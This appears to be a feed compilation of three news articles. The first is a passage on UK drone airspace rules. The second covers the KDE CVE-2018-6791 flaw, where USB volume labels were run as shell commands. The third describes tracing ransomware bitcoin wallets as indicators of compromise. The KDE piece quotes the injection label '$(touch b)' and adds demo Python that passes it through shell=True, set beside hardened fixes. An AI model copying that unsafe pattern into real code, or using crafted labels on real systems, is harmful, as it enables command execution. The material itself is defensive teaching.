Flying drones through Class G airspace is a highly challenging problem because drones do not comply with the “see and avoid” principle. Put simply, if there’s no human in the drone to see what’s going on around it, it can’t avoid crashing into other aircraft. So far nobody has yet demonstrated anything superior to the Mk.1 eyeball and pilot, in terms of avoiding the “bloody hell we’re going to crash, pull up NOW!” scenario, though nobody disputes the inherent flaws of human look-out abilities.

Though military drones such as the troubled Watchkeeper are currently flown BVLOS in the UK, this takes place by declaring the skies around West Wales Airport, Aberporth, the main Watchkeeper operating base, a restricted area for all other aeroplanes. While a Watchkeeper test flight did take place from Aberporth to Farnborough, The Register understands that this relied upon a temporary corridor of prohibited airspace for the drone to fly through, something clearly impractical for routine flights.

For now, air traffic controlled flights only. For the future…

The CAA eventually handed direct oversight of the Predator flying programme to the Military Aviation Authority (MAA), the MoD’s in-house regulator. In turn, the MAA settled on authorising Predator flights “in UK class A-C airspace, separated from manned flights”, with deviations outside that controlled airspace only permitted for landing at military airfields.

Further to that, a corridor of sky between RAF Waddington (presumably the future home of the RAF’s Predator drones) and the nearest Class A-C airspace will be temporarily restricted to other aircraft so the drones can take off and climb into controlled airspace. The Predators will be fitted with a “detect and avoid” system and other equipment designed to broadcast their presence to aircraft fitted with suitable receivers.

What this means for the wider commercial drone sector is significant. In principle, a large drone can now be flown remotely along the same airways as airliners (subject to the usual airworthiness and separation rules). Though the cost advantage of removing the human pilot is shifted sideways to the ground crew (military drones are typically flown by a ground crew of three to four people), the regulatory ability to operate remotely piloted aeroplanes has opened the door for others to build upon this.

“Putting drones into Class G airspace still needs work from the technical point of view,” a CAA spokesman told us.

Three years ago the Watchkeeper drone fleet was approved to enter controlled airspace in the UK. Not much seems to have happened on the BVLOS front since then, and naturally the process resets itself for a new aircraft. But it is a path that has now been trodden a few times – enough, perhaps, to pave the way for others.

Could we see point-to-point hub deliveries by drone enabled by this development? Will future military drone integration efforts see the Holy Grail of Class G BVLOS being reached? Which will be the first company to turn this into a commercial reality in the UK? ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/02/12/predator_drone_approval_airway_flights_uk/

Until last week, you could pwn KDE Linux desktop with a USB stick

A recently resolved flaw in the KDE Linux desktop environment meant that files held on a USB stick could be executed as soon as they were plugged into a vulnerable device.

The security howler created a means to execute arbitrary code on KDE by simply naming a pendrive VFAT volume $() or similar, as explained in this advisory (extract below) put out late last week:

When a vfat thumbdrive which contains `` or $() in its volume label is plugged in and mounted [through] the device notifier, it’s interpreted as a shell command, leaving a possibility of arbitrary command execution. An example of an offending volume label is “$(touch b)”, which will create a file called b in the home folder.


The CVE-2018-6791 vulnerability – unsurprisingly designated as high risk – was fixed on Thursday with an update to the Plasma Desktop.

Plasma versions before 5.12.0 need updating. If this isn’t immediately possible, then a workaround can be applied to avoid potential pwnage, which involves mounting removable devices with Dolphin instead of the device notifier.
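The bug is a textbook case of splicing untrusted input into a string that a shell then parses. The following is an added, constructed example and not KDE’s device notifier code: it stands in "echo" for the real open-this-volume action so it is harmless and runs offline, and shows the vulnerable pattern beside two hardened forms (an argv list with no shell, and shlex quoting where a shell string is unavoidable), plus a small triage check for labels that contain shell metacharacters. Function names, the "b" side-effect file and the label strings are all assumptions for illustration.

```python
import os
import shlex
import subprocess
import tempfile

# Constructed, illustrative code: not KDE's device notifier, only the same
# pattern of splicing an untrusted volume label into a shell command.
# "echo" stands in for the real "open this volume" action so the demo is
# harmless and needs no desktop session.


def open_volume_unsafe(label: str, workdir: str) -> str:
    """Vulnerable pattern: the label is interpolated into a string that
    /bin/sh parses, so $() and backticks in the label become command
    substitution and run with the user's privileges."""
    cmd = f"echo Opening /media/{label}"
    result = subprocess.run(cmd, shell=True, cwd=workdir,
                            capture_output=True, text=True)
    return result.stdout.strip()


def open_volume_safe(label: str, workdir: str) -> str:
    """Hardened: pass an argv list, so no shell is involved and the label
    is just an opaque argument."""
    result = subprocess.run(["echo", f"Opening /media/{label}"], cwd=workdir,
                            capture_output=True, text=True)
    return result.stdout.strip()


def open_volume_quoted(label: str, workdir: str) -> str:
    """If a shell string is unavoidable, quote the untrusted piece before
    interpolating it; shlex.quote wraps it in single quotes."""
    cmd = f"echo Opening /media/{shlex.quote(label)}"
    result = subprocess.run(cmd, shell=True, cwd=workdir,
                            capture_output=True, text=True)
    return result.stdout.strip()


def label_is_suspicious(label: str) -> bool:
    """Triage check: shell metacharacters have no business in a volume label."""
    return any(ch in label for ch in "$`;|&<>()\n")


def demo(label: str = "$(touch b)") -> dict:
    """Run each variant in a scratch directory and report what was printed
    and whether the side effect (a file named 'b') appeared."""
    results = {}
    for name, fn in (("unsafe", open_volume_unsafe),
                     ("safe", open_volume_safe),
                     ("quoted", open_volume_quoted)):
        with tempfile.TemporaryDirectory() as d:
            out = fn(label, d)
            results[name] = {"output": out,
                             "created_b": os.path.exists(os.path.join(d, "b"))}
    results["suspicious"] = label_is_suspicious(label)
    return results


if __name__ == "__main__":
    for name, info in demo().items():
        print(name, info)
```

With the advisory’s label, the unsafe variant prints “Opening /media/” and leaves a file b behind, because the shell ran touch during command substitution; both hardened variants print the label literally and create nothing.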

The project has just released its second generation Ultrabook, the KDE Slimbook II, based on its Neon Linux flavour, with a Spanish hardware manufacturer partner. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/02/12/kde_naming_usb_drive_vuln/

Tracking Bitcoin Wallets as IOCs for Ransomware

By understanding how cybercriminals use bitcoin, threat analysts can connect the dots between cyber extortion, wallet addresses, shared infrastructure, TTPs, and attribution.

Cryptocurrency, particularly bitcoin, has captured the attention of Wall Street and Silicon Valley over the past few months. It seems like everybody wants to talk about bitcoin as if it is something brand new.

The truth is that cryptocurrencies have been the norm on the Dark Web for quite some time. Bitcoin has been the payment method of choice for ransomware and cyber extortion because it lets bad actors operate under a cloak of pseudonymity: every payment is public on the blockchain, but nothing on the chain ties an address to a person. That could be changing. Threat intelligence analysts are beginning to incorporate bitcoin wallet addresses into their investigations, and we’ll soon be able to recognize attack patterns and track attribution. One thing we’ve noticed is that, by following bitcoin transactions, it is possible to track, to some degree, the correlations and connections between cyberattacks.

In order to understand why tracking bitcoin wallet addresses as indicators of compromise (IOCs) is so valuable, we need to understand why cybercriminals use bitcoin in the first place. There are three primary reasons.

Anonymity: Bitcoin provides a degree of anonymity when payments are received and when they are cashed out. Addresses are not registered to anyone, so tying an address or a transfer to a real person is difficult and depends largely on the cybercriminal being sloppy with operational security, most often at the point where coins are converted to cash.

Global Currency: Hackers typically prey on out-of-country targets and need a fast, untraceable method to transfer funds across nations without worrying about account freezes. Bitcoin is used as a global currency because you don’t need to worry about the exchange rates between your home country’s currency and US dollars.

Ease of Payments: In the past, hackers relied on gift cards for payment. This was troublesome on many levels; for instance, gift cards can’t be used globally, and criminals needed to come up with a mailing address that couldn’t be traced. Bitcoin and the higher profile of cryptocurrency have contributed to the rise in ransomware, as well as to hackers’ ability to use extortion to elicit payments. One example occurred after the Ashley Madison website breach, when hackers demanded a bitcoin ransom from some users under threat of revealing them as adulterers. Another tactic involved malicious emails threatening a distributed denial-of-service attack on an organization’s network unless a bitcoin payment was made.

By tracking bitcoin wallet addresses as an IOC, we’ve been able to connect the dots between ransomware, wallet addresses, and shared infrastructure, TTPs (tactics, techniques, and procedures), and attribution.

Here is an example of how bitcoin is used in a ransomware campaign: a new piece of ransomware gives you a bitcoin address for payment. You can then make correlations that connect across sectors, like retail, energy, or technology groups, based on the blockchain and/or reuse of the same address. With WannaCry, there were three hard-coded bitcoin addresses, which made it easy to correlate what you were dealing with and which sectors were being affected. The more bitcoin addresses are shared, the more you can identify addresses to which bitcoins are forwarded.

The ability to track transactions through the blockchain allows you to connect different ransomware campaigns. Cybercriminals don’t typically share bitcoin wallets as they might share the same exploit kit, but by tracking blockchain transactions, analysts have another investigation point from which they can pivot and dig for more.

Addresses are often unique to each target or a small set of targets, but you can track where the money goes by looking at the blockchain (the transactions) to see which addresses deliver funds to the same final addresses before being cashed out.

Why is it important to be able to track bitcoin wallets as IOCs? With the ability to track payments, you can determine if bitcoins are going to specific wallet addresses, and then narrow that down to determine if they are the same two or three addresses over time. This will give you some idea of where and when cybercriminals are cashing out.

The value of this metadata as an indicator of malicious activity lies in the fact that, although there are many variants of ransomware, the number of variants does not necessarily represent separate campaigns or cybercriminal groups. If you can follow the transactions through the blockchain, you can see how or whether these variants are connected, and identify specific campaigns.
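The pivots described above (following ransom addresses forward through the blockchain until they converge on the same cash-out addresses, and treating addresses spent together as one owner) can be reduced to two graph operations. The following is an added example and not TruSTAR’s tooling or method: it uses a constructed toy ledger in which labels such as R1 or X1 stand in for addresses and are not real bitcoin addresses or transactions, and the function names and the five-hop limit are assumptions. It shows one campaign’s two ransom addresses and a second campaign’s address being swept into separate collectors that both feed a single cash-out address, which is exactly the “same two or three addresses over time” signal the text describes.

```python
from collections import defaultdict, deque

# Constructed sample ledger (not real addresses or transactions).
# Each entry is (txid, input addresses, output addresses).
SAMPLE_TXS = [
    ("tx1", ["R1", "R2"], ["C1"]),   # two ransom addresses swept into collector C1
    ("tx2", ["R3"], ["C2"]),         # a third ransom address, separate collector
    ("tx3", ["C1", "C2"], ["X1"]),   # both collectors paid into one cash-out address
    ("tx4", ["U1"], ["U2"]),         # unrelated activity, should never be linked
]


def build_flow_graph(txs):
    """Directed graph with an edge a -> b whenever funds from a end up in b."""
    graph = defaultdict(set)
    for _, inputs, outputs in txs:
        for addr in inputs:
            graph[addr].update(outputs)
    return graph


def downstream(graph, start, max_hops=5):
    """Addresses reachable from `start` within max_hops transactions (BFS).
    The hop limit keeps the walk from swallowing the whole ledger once funds
    hit a busy exchange hot wallet."""
    seen, queue = {start}, deque([(start, 0)])
    while queue:
        addr, hops = queue.popleft()
        if hops == max_hops:
            continue
        for nxt in graph.get(addr, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, hops + 1))
    seen.discard(start)
    return seen


def common_sinks(txs, ransom_addrs, max_hops=5):
    """Addresses that *every* listed ransom address eventually pays into:
    candidate cash-out points shared across victims or campaigns."""
    graph = build_flow_graph(txs)
    sets = [downstream(graph, a, max_hops) for a in ransom_addrs]
    return set.intersection(*sets) if sets else set()


def link_campaigns(txs, campaigns, max_hops=5):
    """Map each downstream address to the set of campaigns whose funds reach it.
    `campaigns` is {campaign name: [ransom addresses]}; a sink reached by two
    names is evidence those variants share an operator."""
    graph = build_flow_graph(txs)
    reached_by = defaultdict(set)
    for name, addrs in campaigns.items():
        for addr in addrs:
            for sink in downstream(graph, addr, max_hops):
                reached_by[sink].add(name)
    return dict(reached_by)


def cluster_by_coinput(txs):
    """Common-input-ownership heuristic: addresses spent together as inputs of
    one transaction are assumed to share a controller. Union-find over inputs."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    for _, inputs, _ in txs:
        for addr in inputs:
            union(inputs[0], addr)
    groups = defaultdict(set)
    for addr in list(parent):
        groups[find(addr)].add(addr)
    return {frozenset(g) for g in groups.values()}


if __name__ == "__main__":
    print("common cash-out:", common_sinks(SAMPLE_TXS, ["R1", "R2", "R3"]))
    print("campaign links:", link_campaigns(SAMPLE_TXS, {"A": ["R1", "R2"], "B": ["R3"]}))
    print("co-input clusters:", cluster_by_coinput(SAMPLE_TXS))
```

Against real data the inputs would be address lists and transactions pulled from a block explorer or a full node; the hop limit and the co-input heuristic both break down once funds pass through an exchange or a mixer, so a shared sink is a lead to pivot from, not attribution on its own.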

There is a well-known saying that if you want to know where trouble is coming from, follow the money. It’s hard to follow bitcoins, but all of those bitcoin wallets can help you see how ransomware is connected.

This research was provided by the TruSTAR Data Science Unit, which has also published the ten bitcoin addresses with the highest IOC correlations on its platform.


Curtis Jordan is TruSTAR’s lead security engineer where he manages engagement with the TruSTAR network of security operators from Fortune 100 companies and leads security research and intelligence analysis. Prior to working with TruSTAR, Jordan worked at CyberPoint …

Article source: https://www.darkreading.com/threat-intelligence/tracking-bitcoin-wallets-as-iocs-for-ransomware-/a/d-id/1331016?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple